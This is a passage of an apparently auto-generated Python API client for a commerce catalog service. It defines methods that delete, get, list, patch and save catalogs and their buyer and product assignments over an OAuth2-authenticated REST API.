path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_assignment(self, catalog_id, buyer_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_assignment(catalog_id, buyer_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str buyer_id: ID of the buyer. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs) else: (data) = self.delete_assignment_with_http_info(catalog_id, buyer_id, **kwargs) return data def delete_assignment_with_http_info(self, catalog_id, buyer_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_assignment_with_http_info(catalog_id, buyer_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str buyer_id: ID of the buyer. (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'buyer_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete_assignment`") # verify the required parameter 'buyer_id' is set if ('buyer_id' not in params) or (params['buyer_id'] is None): raise ValueError("Missing the required parameter `buyer_id` when calling `delete_assignment`") resource_path = '/catalogs/{catalogID}/assignments'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} if 'buyer_id' in params: query_params['buyerID'] = params['buyer_id'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def delete_product_assignment(self, catalog_id, product_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_product_assignment(catalog_id, product_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str product_id: ID of the product. (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs) else: (data) = self.delete_product_assignment_with_http_info(catalog_id, product_id, **kwargs) return data def delete_product_assignment_with_http_info(self, catalog_id, product_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.delete_product_assignment_with_http_info(catalog_id, product_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param str product_id: ID of the product. (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'product_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_product_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `delete_product_assignment`") # verify the required parameter 'product_id' is set if ('product_id' not in params) or (params['product_id'] is None): raise ValueError("Missing the required parameter `product_id` when calling `delete_product_assignment`") resource_path = '/catalogs/{catalogID}/productassignments/{productID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] if 'product_id' in params: path_params['productID'] = params['product_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_with_http_info(catalog_id, **kwargs) else: (data) = self.get_with_http_info(catalog_id, **kwargs) return data def get_with_http_info(self, catalog_id, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_with_http_info(catalog_id, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `get`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search: Word or phrase to search for. :param str search_on: Comma-delimited list of fields to search on. :param str sort_by: Comma-delimited list of fields to sort by. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???' :return: ListCatalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_with_http_info(**kwargs) else: (data) = self.list_with_http_info(**kwargs) return data def list_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search: Word or phrase to search for. :param str search_on: Comma-delimited list of fields to search on. :param str sort_by: Comma-delimited list of fields to sort by. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpretted as filters. Valid keys are top-level properties of the returned model or 'xp.???' :return: ListCatalog If the method is called asynchronously, returns the request thread. """ all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size', 'filters'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs'.replace('{format}', 'json') path_params = {} query_params = {} if 'search' in params: query_params['search'] = params['search'] if 'search_on' in params: query_params['searchOn'] = params['search_on'] if 'sort_by' in params: query_params['sortBy'] = params['sort_by'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] if 'filters' in params: query_params['filters'] = params['filters'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListCatalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list_assignments(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_assignments(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str buyer_id: ID of the buyer. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListCatalogAssignment If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_assignments_with_http_info(**kwargs) else: (data) = self.list_assignments_with_http_info(**kwargs) return data def list_assignments_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_assignments_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str buyer_id: ID of the buyer. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListCatalogAssignment If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'buyer_id', 'page', 'page_size'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_assignments" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs/assignments'.replace('{format}', 'json') path_params = {} query_params = {} if 'catalog_id' in params: query_params['catalogID'] = params['catalog_id'] if 'buyer_id' in params: query_params['buyerID'] = params['buyer_id'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListCatalogAssignment', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def list_product_assignments(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_product_assignments(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str product_id: ID of the product. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListProductCatalogAssignment If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.list_product_assignments_with_http_info(**kwargs) else: (data) = self.list_product_assignments_with_http_info(**kwargs) return data def list_product_assignments_with_http_info(self, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.list_product_assignments_with_http_info(callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. :param str product_id: ID of the product. :param int page: Page of results to return. Default: 1 :param int page_size: Number of results to return per page. Default: 20, max: 100. :return: ListProductCatalogAssignment If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'product_id', 'page', 'page_size'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_product_assignments" % key ) params[key] = val del params['kwargs'] resource_path = '/catalogs/productassignments'.replace('{format}', 'json') path_params = {} query_params = {} if 'catalog_id' in params: query_params['catalogID'] = params['catalog_id'] if 'product_id' in params: query_params['productID'] = params['product_id'] if 'page' in params: query_params['page'] = params['page'] if 'page_size' in params: query_params['pageSize'] = params['page_size'] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ListProductCatalogAssignment', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def patch(self, catalog_id, partial_catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.patch(catalog_id, partial_catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog partial_catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.patch_with_http_info(catalog_id, partial_catalog, **kwargs) else: (data) = self.patch_with_http_info(catalog_id, partial_catalog, **kwargs) return data def patch_with_http_info(self, catalog_id, partial_catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.patch_with_http_info(catalog_id, partial_catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog partial_catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'partial_catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method patch" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `patch`") # verify the required parameter 'partial_catalog' is set if ('partial_catalog' not in params) or (params['partial_catalog'] is None): raise ValueError("Missing the required parameter `partial_catalog` when calling `patch`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'partial_catalog' in params: body_params = params['partial_catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'PATCH', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def save(self, catalog_id, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save(catalog_id, catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.save_with_http_info(catalog_id, catalog, **kwargs) else: (data) = self.save_with_http_info(catalog_id, catalog, **kwargs) return data def save_with_http_info(self, catalog_id, catalog, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_with_http_info(catalog_id, catalog, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str catalog_id: ID of the catalog. (required) :param Catalog catalog: (required) :return: Catalog If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_id', 'catalog'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method save" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_id' is set if ('catalog_id' not in params) or (params['catalog_id'] is None): raise ValueError("Missing the required parameter `catalog_id` when calling `save`") # verify the required parameter 'catalog' is set if ('catalog' not in params) or (params['catalog'] is None): raise ValueError("Missing the required parameter `catalog` when calling `save`") resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json') path_params = {} if 'catalog_id' in params: path_params['catalogID'] = params['catalog_id'] query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog' in params: body_params = params['catalog'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Catalog', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def save_assignment(self, catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_assignment(catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param CatalogAssignment catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.save_assignment_with_http_info(catalog_assignment, **kwargs) else: (data) = self.save_assignment_with_http_info(catalog_assignment, **kwargs) return data def save_assignment_with_http_info(self, catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_assignment_with_http_info(catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param CatalogAssignment catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['catalog_assignment'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method save_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'catalog_assignment' is set if ('catalog_assignment' not in params) or (params['catalog_assignment'] is None): raise ValueError("Missing the required parameter `catalog_assignment` when calling `save_assignment`") resource_path = '/catalogs/assignments'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'catalog_assignment' in params: body_params = params['catalog_assignment'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def save_product_assignment(self, product_catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_product_assignment(product_catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param ProductCatalogAssignment product_catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs) else: (data) = self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs) return data def save_product_assignment_with_http_info(self, product_catalog_assignment, **kwargs): """ This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.save_product_assignment_with_http_info(product_catalog_assignment, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param ProductCatalogAssignment product_catalog_assignment: (required) :return: None If the method is called asynchronously, returns the request thread. """ all_params = ['product_catalog_assignment'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method save_product_assignment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'product_catalog_assignment' is set if ('product_catalog_assignment' not in params) or (params['product_catalog_assignment'] is None): raise ValueError("Missing the required parameter `product_catalog_assignment` when calling `save_product_assignment`") resource_path = '/catalogs/productassignments'.replace('{format}', 'json') path_params = {} query_params = {} header_params = {} form_params = [] local_var_files = {} body_params = None if 'product_catalog_assignment' in params: body_params = params['product_catalog_assignment'] # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json', 'text/plain; charset=utf-8']) # Authentication setting auth_settings = ['oauth2'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'))
nilq/baby-python
python